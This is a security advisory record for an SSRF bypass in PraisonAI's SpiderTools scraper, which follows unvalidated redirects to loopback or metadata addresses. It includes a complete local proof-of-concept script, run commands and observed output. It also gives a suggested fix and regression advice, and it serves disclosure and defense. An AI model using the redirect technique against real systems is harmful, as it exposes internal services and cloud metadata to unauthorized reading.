{"id":"GHSA-6h9p-93hq-q7h6","title":"PraisonAI: SpiderTools redirect-target SSRF protection bypass","summary":"PraisonAI: SpiderTools redirect-target SSRF protection bypass","severity":"medium","cvss":6.5,"cwe":["CWE-918"],"vendor":"praisonaiagents","product":"praisonaiagents","ecosystem":"pip","affected":["praisonaiagents <= 1.6.58"],"patched":["praisonaiagents 1.6.59"],"published":"2026-06-18","updated":"2026-06-18","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-6h9p-93hq-q7h6","references":[{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6h9p-93hq-q7h6"},{"url":"https://github.com/advisories/GHSA-6h9p-93hq-q7h6"}],"tags":["ghsa","pip"],"ingestedAt":"2026-06-29T14:31:46.973Z","slug":"GHSA-6h9p-93hq-q7h6","body":"## Overview\n\n# SpiderTools redirect-target SSRF protection bypass\n\n## Summary\n\n`SpiderTools.scrape_page()` validates the initial URL and rejects direct\nloopback, private, link-local, metadata, and internal hostnames. It then calls\n`requests.Session.get()` without disabling automatic redirects or validating\nredirect `Location` targets.\n\nRequests follows redirects by default for GET requests. A safe-looking public\nURL can therefore pass `_validate_url()`, redirect to a blocked target such as\n`127.0.0.1` or `169.254.169.254`, and have the redirected response body parsed\nand returned by `scrape_page()`.\n\nThe same sink is used by `extract_links()`, `crawl()`, and `extract_text()`\nthrough their calls to `scrape_page()`.\n\n## Affected component\n\n```text\nsrc/praisonai-agents/praisonaiagents/tools/spider_tools.py\n```\n\nTested affected:\n\n- `v3.9.24` / `d08d98ca`\n- `v3.9.26` / `62472a23`\n- `v4.6.56` / `d3c4a2af`\n- `v4.6.57` / `e90d92231853161ad931f3498da57651a9f8b528`\n- current main `2f9677abb2ea68eab864ee8b6a828fd0141612e1`\n\nNo patched version is known at report time.\n\n## Root cause\n\nCurrent main validates only the caller-supplied URL:\n\n```python\nif not self._validate_url(url):\n    return {\"error\": f\"Invalid or potentially dangerous URL: {url}\"}\n```\n\nThe fetch then uses Requests defaults:\n\n```python\nresponse = session.get(\n    url,\n    timeout=timeout,\n    verify=verify_ssl\n)\n```\n\nBecause `allow_redirects=False` is not set, Requests follows a 3xx redirect to a\nnew destination that has not been checked by `_validate_url()` or\n`_host_is_blocked()`.\n\n## Proof of vulnerability\n\nThe PoV below is local-only and does not contact external infrastructure. It\nstarts a loopback-only internal service and a local redirector. During\nPraisonAI's initial host validation, `attacker.test` is made to look like a\npublic address. During the actual HTTP request, it routes to the local\nredirector, which returns `302 Location: http://127.0.0.1:<port>/secret`.\n\nFull PoV:\n\n```python\n#!/usr/bin/env python3\n\"\"\"Local PoV for SpiderTools redirect-target SSRF.\n\nThis uses only loopback services. The \"attacker\" hostname is treated as public\nduring PraisonAI's initial URL validation, then routed to a local redirector so\nthe PoV does not contact external infrastructure. The redirector points at a\nloopback-only internal service. Vulnerable behavior is confirmed when\nSpiderTools follows that redirect and returns the internal response body.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport http.server\nimport importlib.util\nimport inspect\nimport os\nimport socket\nimport socketserver\nimport threading\nfrom typing import Any\n\n\ndef _load_spider_tools_class():\n    module_file = os.environ.get(\"PRAISONAI_SPIDER_TOOLS_FILE\")\n    if module_file:\n        spec = importlib.util.spec_from_file_location(\"pov_spider_tools\", module_file)\n        if spec is None or spec.loader is None:\n            raise RuntimeError(f\"Could not load spider_tools file: {module_file}\")\n        module = importlib.util.module_from_spec(spec)\n        spec.loader.exec_module(module)\n        return module.SpiderTools\n\n    from praisonaiagents.tools.spider_tools import SpiderTools\n\n    return SpiderTools\n\n\nclass InternalHandler(http.server.BaseHTTPRequestHandler):\n    body = b\"SPIDER-INTERNAL-SECRET\"\n\n    def do_GET(self) -> None:  # noqa: N802\n        self.server.hit = True  # type: ignore[attr-defined]\n        self.send_response(200)\n        self.send_header(\"Content-Type\", \"text/html\")\n        self.send_header(\"Content-Length\", str(len(self.body)))\n        self.end_headers()\n        self.wfile.write(self.body)\n\n    def log_message(self, *_args: Any) -> None:\n        return\n\n\nclass RedirectHandler(http.server.BaseHTTPRequestHandler):\n    target = \"\"\n\n    def do_GET(self) -> None:  # noqa: N802\n        self.server.hit = True  # type: ignore[attr-defined]\n        self.send_response(302)\n        self.send_header(\"Location\", self.target)\n        self.end_headers()\n\n    def log_message(self, *_args: Any) -> None:\n        return\n\n\ndef _called_from_spider_host_guard() -> bool:\n    return any(frame.function == \"_host_is_blocked\" for frame in inspect.stack())\n\n\ndef main() -> int:\n    os.environ.pop(\"ALLOW_LOCAL_CRAWL\", None)\n\n    internal = socketserver.TCPServer((\"127.0.0.1\", 0), InternalHandler)\n    internal.hit = False  # type: ignore[attr-defined]\n    internal_port = internal.server_address[1]\n\n    RedirectHandler.target = f\"http://127.0.0.1:{internal_port}/secret\"\n    redirect = socketserver.TCPServer((\"127.0.0.1\", 0), RedirectHandler)\n    redirect.hit = False  # type: ignore[attr-defined]\n    redirect_port = redirect.server_address[1]\n\n    threading.Thread(target=internal.serve_forever, daemon=True).start()\n    threading.Thread(target=redirect.serve_forever, daemon=True).start()\n\n    original_getaddrinfo = socket.getaddrinfo\n\n    def fake_getaddrinfo(host: str, port: int, *args: Any, **kwargs: Any):\n        if host == \"attacker.test\":\n            if _called_from_spider_host_guard():\n                return [\n                    (\n                        socket.AF_INET,\n                        socket.SOCK_STREAM,\n                        6,\n                        \"\",\n                        (\"93.184.216.34\", port),\n                    )\n                ]\n            return original_getaddrinfo(\"127.0.0.1\", port, *args, **kwargs)\n        return original_getaddrinfo(host, port, *args, **kwargs)\n\n    tool = _load_spider_tools_class()()\n    socket.getaddrinfo = fake_getaddrinfo\n    try:\n        direct_control = tool.scrape_page(\n            f\"http://127.0.0.1:{internal_port}/secret\",\n            timeout=5,\n        )\n        redirect_result = tool.scrape_page(\n            f\"http://attacker.test:{redirect_port}/go\",\n            timeout=5,\n        )\n        vulnerable_redirect_hit = bool(redirect.hit)  # type: ignore[attr-defined]\n        vulnerable_internal_hit = bool(internal.hit)  # type: ignore[attr-defined]\n\n        redirect.hit = False  # type: ignore[attr-defined]\n        internal.hit = False  # type: ignore[attr-defined]\n\n        import requests\n\n        original_session_get = requests.Session.get\n\n        def no_redirect_get(self, url, **kwargs):  # type: ignore[no-untyped-def]\n            kwargs.setdefault(\"allow_redirects\", False)\n            return original_session_get(self, url, **kwargs)\n\n        requests.Session.get = no_redirect_get\n        try:\n            no_redirect_control = _load_spider_tools_class()().scrape_page(\n                f\"http://attacker.test:{redirect_port}/go\",\n                timeout=5,\n            )\n        finally:\n            requests.Session.get = original_session_get\n        no_redirect_redirect_hit = bool(redirect.hit)  # type: ignore[attr-defined]\n        no_redirect_internal_hit = bool(internal.hit)  # type: ignore[attr-defined]\n    finally:\n        socket.getaddrinfo = original_getaddrinfo\n        redirect.shutdown()\n        internal.shutdown()\n        redirect.server_close()\n        internal.server_close()\n\n    print(\"DIRECT_CONTROL:\", direct_control)\n    print(\"REDIRECT_RESULT:\", redirect_result)\n    print(\"REDIRECT_SERVER_HIT:\", vulnerable_redirect_hit)\n    print(\"INTERNAL_SERVER_HIT:\", vulnerable_internal_hit)\n    print(\"NO_REDIRECT_CONTROL:\", no_redirect_control)\n    print(\"NO_REDIRECT_SERVER_HIT:\", no_redirect_redirect_hit)\n    print(\"NO_REDIRECT_INTERNAL_HIT:\", no_redirect_internal_hit)\n\n    if not isinstance(direct_control, dict) or \"dangerous URL\" not in str(direct_control):\n        raise SystemExit(\"control failed: direct loopback was not blocked\")\n    if not isinstance(redirect_result, dict) or \"error\" in redirect_result:\n        raise SystemExit(f\"bypass failed: unexpected result {redirect_result!r}\")\n    if \"SPIDER-INTERNAL-SECRET\" not in str(redirect_result.get(\"content\", \"\")):\n        raise SystemExit(\"bypass failed: internal body was not returned\")\n    if not vulnerable_redirect_hit or not vulnerable_internal_hit:\n        raise SystemExit(\"bypass failed: expected local servers were not hit\")\n    if not no_redirect_redirect_hit or no_redirect_internal_hit:\n        raise SystemExit(\"fix control failed: no-redirect mode reached internal service\")\n\n    print(\"PRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback\")\n    return 0\n\n\nif __name__ == \"__main__\":\n    raise SystemExit(main())\n```\n\nRun:\n\n```fish\ncd /Users/rexliu/Documents/GA\\ code/REDit\\ Deployment/stack/deploy\nenv PRAISONAI_SPIDER_TOOLS_FILE=/path/to/PraisonAI/src/praisonai-agents/praisonaiagents/tools/spider_tools.py \\\n  uv run --with requests --with beautifulsoup4 --with lxml --python 3.11 \\\n  poc_spider_tools_redirect_ssrf.py\n```\n\nObserved on current main:\n\n```text\nDIRECT_CONTROL: {'error': 'Invalid or potentially dangerous URL: http://127.0.0.1:<port>/secret'}\nREDIRECT_RESULT: {'url': 'http://attacker.test:<port>/go', 'status_code': 200, ... 'content': 'SPIDER-INTERNAL-SECRET', ...}\nREDIRECT_SERVER_HIT: True\nINTERNAL_SERVER_HIT: True\nNO_REDIRECT_CONTROL: {'url': 'http://attacker.test:<port>/go', 'status_code': 302, ... 'Location': 'http://127.0.0.1:<port>/secret', ...}\nNO_REDIRECT_SERVER_HIT: True\nNO_REDIRECT_INTERNAL_HIT: False\nPRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback\n```\n\nThe direct control proves direct loopback is blocked. The redirect result proves\nthe same blocked destination is reached through a public-looking initial URL.\nThe no-redirect control proves that disabling automatic redirects prevents the\ninternal request while still receiving the external redirect response.\n\n## Why this is not intended behavior\n\nThe Spider Tools documentation says `scrape_page`, `extract_links`, `crawl`, and\n`extract_text` refuse dangerous URLs before network requests. The documented\nblocked classes include loopback, private/reserved IPs, link-local/cloud\nmetadata endpoints, internal TLDs, non-HTTP(S) schemes, and parser-smuggling\nforms. The same page states the validation is always on for bundled spider tools\nand does not require `enable_security()`.\n\nThe current code also documents `_validate_url()` as URL validation \"to prevent\nSSRF attacks.\" A redirect to a loopback target bypasses that documented\nprotection.\n\n## Impact\n\nAn attacker who can influence a URL passed to `scrape_page()`,\n`extract_links()`, `crawl()`, or `extract_text()` can cause the PraisonAI process\nto request destinations that SpiderTools is designed to block.\n\nPotential impact includes:\n\n- reading loopback-only HTTP services;\n- probing or reading private network services reachable from the PraisonAI host;\n- reading link-local/cloud metadata endpoints if reachable in the deployment\n  environment.\n\nThe PoV demonstrates returned response-body disclosure from a loopback-only\nservice. This report does not claim arbitrary code execution or live cloud\ncredential theft without deployment-specific evidence.\n\n## Severity\n\nSuggested default severity: Moderate.\n\nHigh severity may be appropriate for deployments where untrusted users can\ndirectly invoke SpiderTools through a network-facing agent, bot, API, or MCP\nservice and sensitive internal or metadata services are reachable.\n\n## Suggested fix\n\nDisable automatic redirects in `scrape_page()`:\n\n```python\nresponse = session.get(\n    url,\n    timeout=timeout,\n    verify=verify_ssl,\n    allow_redirects=False,\n)\n```\n\nIf redirects should remain supported, follow them manually and validate every\n`Location` target before each hop using the same SSRF guard:\n\n- require `http` or `https`;\n- resolve and validate every redirect hostname;\n- reject loopback, private, link-local, reserved, multicast, unspecified,\n  internal, and metadata destinations;\n- cap redirect count;\n- apply the same safe fetch path to `scrape_page()`, `extract_links()`,\n  `crawl()`, and `extract_text()`.\n\nRegression tests should cover direct loopback rejection, public-to-loopback\nredirect rejection, public-to-public redirects if supported, and all\n`scrape_page()` callers.\n\n## Affected packages\n\n- `praisonaiagents <= 1.6.58`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `praisonaiagents 1.6.59`","depth":"sunlit","depthScore":36,"depthScoreParts":{"impact":35.8,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}